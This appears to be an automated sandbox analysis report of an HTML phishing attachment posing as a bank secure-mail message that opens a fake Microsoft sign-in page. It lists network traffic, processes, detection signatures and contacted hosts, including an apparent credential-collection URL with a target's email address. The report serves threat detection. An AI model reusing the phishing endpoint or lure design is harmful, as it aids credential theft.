Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.35.236.56:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.135:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49862 version: TLS 1.2

System Summary
barindex
HTML document with suspicious title
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html Tab title: Sign in to your account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\5aba1b91-3f29-4a1d-be20-5481c4ffda6f.tmp Jump to behavior
Source: classification engine Classification label: mal56.phis.winHTML@26/116@6/11
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,2893178873461922982,2517917473115045809,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1556 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,2893178873461922982,2517917473115045809,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1556 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-627EE0C7-1BFC.pma Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626103 Sample: bsalazarSecuremail#Redriver... Startdate: 13/05/2022 Architecture: WINDOWS Score: 56 13 part-0032.t-0009.t-msedge.net 2->13 15 dual.part-0032.t-0009.t-msedge.net 2->15 17 2 other IPs or domains 2->17 31 Yara detected HtmlPhish10 2->31 33 HTML document with suspicious title 2->33 35 Phishing site detected (based on image similarity) 2->35 7 chrome.exe 15 260 2->7         started        signatures3 process4 dnsIp5 19 192.168.2.1 unknown unknown 7->19 21 192.168.2.255, 137 unknown unknown 7->21 23 3 other IPs or domains 7->23 10 chrome.exe 16 7->10         started        process6 dnsIp7 25 part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49748, 49749 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 10->25 27 lootahbf.work 173.231.212.223, 443, 49754 INMOTI-1US United States 10->27 29 8 other IPs or domains 10->29
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
173.231.212.223
 lootahbf.work United States
54641 INMOTI-1US false
142.250.185.238
 clients.l.google.com United States
15169 GOOGLEUS false
13.107.246.60
 part-0032.t-0009.t-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
239.255.255.250
 unknown Reserved
unknown unknown false
152.199.23.37
 cs1100.wpc.omegacdn.net United States
15133 EDGECASTUS false
142.250.186.77
 accounts.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.1
192.168.2.4
192.168.2.5
192.168.2.255
127.0.0.1

Contacted Domains

Name IP Active
cs1100.wpc.omegacdn.net 152.199.23.37 true
accounts.google.com 142.250.186.77 true
part-0032.t-0009.t-msedge.net 13.107.246.60 true
clients.l.google.com 142.250.185.238 true
lootahbf.work 173.231.212.223 true
clients2.google.com unknown unknown
code.jquery.com unknown unknown
aadcdn.msftauth.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 false
    		high
    https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard false
      		high
      https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg false
      • URL Reputation: safe
      		 unknown
      https://lootahbf.work/prv.phpbsalazar@redriverbank.net false
      • Avira URL Cloud: safe
      		 unknown
      file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html true
        		low
        https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg false
        • URL Reputation: safe
        		 unknown